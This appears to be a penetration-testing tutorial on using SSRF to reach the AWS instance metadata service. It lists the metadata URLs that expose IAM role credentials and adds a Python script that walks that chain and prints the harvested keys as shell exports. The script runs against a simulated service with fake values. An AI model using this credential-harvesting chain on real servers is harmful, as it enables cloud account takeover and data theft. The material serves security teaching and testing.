SSRF

Some systems serve sensitive data only on localhost, the loopback interface, or other ports that are not exposed to the network. With an SSRF, the vulnerable server makes the request on our behalf, so we can read from places that are normally unreachable from the outside. Some of these endpoints hold further data that lets us move deeper and deeper into an environment. One of the endpoints we will discuss is the AWS instance metadata service (IMDS). Its link-local address is the same on every EC2 instance, regardless of account or region, so no reconnaissance is needed to find it.

This lists the metadata categories for the instance in question (one per line)

http://169.254.169.254/latest/meta-data

This lists the name of the IAM role attached to the instance profile (if no role is attached, the path returns a 404).

http://169.254.169.254/latest/meta-data/iam/security-credentials

Once you have the role name, query it to retrieve the temporary credentials. The response is JSON containing AccessKeyId, SecretAccessKey, Token and Expiration; all three secret values are needed to use the keys (for example as AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN), and they stop working at the Expiration time. One caveat: if the instance enforces IMDSv2, every request must carry an X-aws-ec2-metadata-token header obtained with a PUT to http://169.254.169.254/latest/api/token, which an SSRF limited to plain GET requests cannot do.

http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>
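The three steps above, walked as one chain. This is an added example and not code from the original page; the fetch callable is an assumption standing in for the vulnerable server-side request (in a real engagement it would be whatever parameter the application fetches for you), and the fake IMDS responses, role name and credential values are constructed so the script runs offline. It also goes slightly beyond the page by handling the IMDSv2 token step and by modelling an SSRF that can only issue plain GETs, so you can see where the chain stops.

```python
"""Walk the IMDS credential chain through an SSRF-style fetch (added example)."""
import json

IMDS_BASE = "http://169.254.169.254/latest"
CREDS_PATH = "/meta-data/iam/security-credentials/"
TOKEN_PATH = "/api/token"  # IMDSv2 token endpoint


def imdsv2_token(fetch, ttl=21600):
    """IMDSv2 needs a PUT with a TTL header; returns None when the SSRF
    primitive cannot issue PUTs or custom headers."""
    return fetch("PUT", IMDS_BASE + TOKEN_PATH,
                 {"X-aws-ec2-metadata-token-ttl-seconds": str(ttl)})


def harvest_credentials(fetch):
    """Return {role: credential-json} using IMDSv1, falling back to IMDSv2.

    fetch(method, url, headers) is assumed to return the body the vulnerable
    server proxied back, or None when the request failed or was not possible.
    """
    headers = {}
    body = fetch("GET", IMDS_BASE + CREDS_PATH, headers)
    if body is None:  # v1 refused: try the v2 token dance
        token = imdsv2_token(fetch)
        if token is None:
            return {}
        headers = {"X-aws-ec2-metadata-token": token}
        body = fetch("GET", IMDS_BASE + CREDS_PATH, headers)
        if body is None:
            return {}
    result = {}
    for role in (r.strip() for r in body.splitlines() if r.strip()):
        raw = fetch("GET", IMDS_BASE + CREDS_PATH + role, headers)
        if raw is None:
            continue
        creds = json.loads(raw)
        if creds.get("Code") == "Success":  # IMDS marks usable creds this way
            result[role] = creds
    return result


def as_env_exports(creds):
    """Shell exports so the AWS CLI/SDK picks up the harvested temporary keys."""
    return "\n".join([
        f"export AWS_ACCESS_KEY_ID={creds['AccessKeyId']}",
        f"export AWS_SECRET_ACCESS_KEY={creds['SecretAccessKey']}",
        f"export AWS_SESSION_TOKEN={creds['Token']}",
    ])


# --- constructed stand-in for the metadata service (not real data) ---
FAKE_ROLE = "web-app-role"
FAKE_TOKEN = "example-imdsv2-token"
FAKE_CREDS = {
    "Code": "Success", "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAEXAMPLEKEY000001",
    "SecretAccessKey": "example-secret-key",
    "Token": "example-session-token",
    "Expiration": "2030-01-01T00:00:00Z",
}


def fake_imds(require_v2):
    """Constructed IMDS: answers v1 GETs, or only token-bearing GETs if require_v2."""
    def fetch(method, url, headers):
        if not url.startswith(IMDS_BASE):
            return None
        path = url[len(IMDS_BASE):]
        if method == "PUT" and path == TOKEN_PATH:
            return FAKE_TOKEN
        if method != "GET":
            return None
        if require_v2 and headers.get("X-aws-ec2-metadata-token") != FAKE_TOKEN:
            return None  # IMDSv2 returns 401 without a valid token
        if path == CREDS_PATH:
            return FAKE_ROLE + "\n"
        if path == CREDS_PATH + FAKE_ROLE:
            return json.dumps(FAKE_CREDS)
        return None
    return fetch


def get_only(fetch):
    """Model an SSRF primitive that can only issue plain GETs with no headers."""
    def limited(method, url, headers):
        if method != "GET" or headers:
            return None
        return fetch(method, url, {})
    return limited


if __name__ == "__main__":
    for label, target in [("IMDSv1 instance, GET-only SSRF", get_only(fake_imds(False))),
                          ("IMDSv2-only instance, GET-only SSRF", get_only(fake_imds(True))),
                          ("IMDSv2-only instance, full HTTP control", fake_imds(True))]:
        found = harvest_credentials(target)
        print(f"{label}: {list(found) or 'no credentials'}")
        for creds in found.values():
            print(as_env_exports(creds))
```

The second scenario is the practical limit of a GET-only SSRF against an instance that enforces IMDSv2; the chain only completes when the primitive can send a PUT and a custom header (for example an SSRF in a server-side HTTP client whose method and headers you control).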

This is just one example of how SSRFs can be taken advantage of in a cloud environment, where a single server-side request can expose far more than it would in a traditional network.
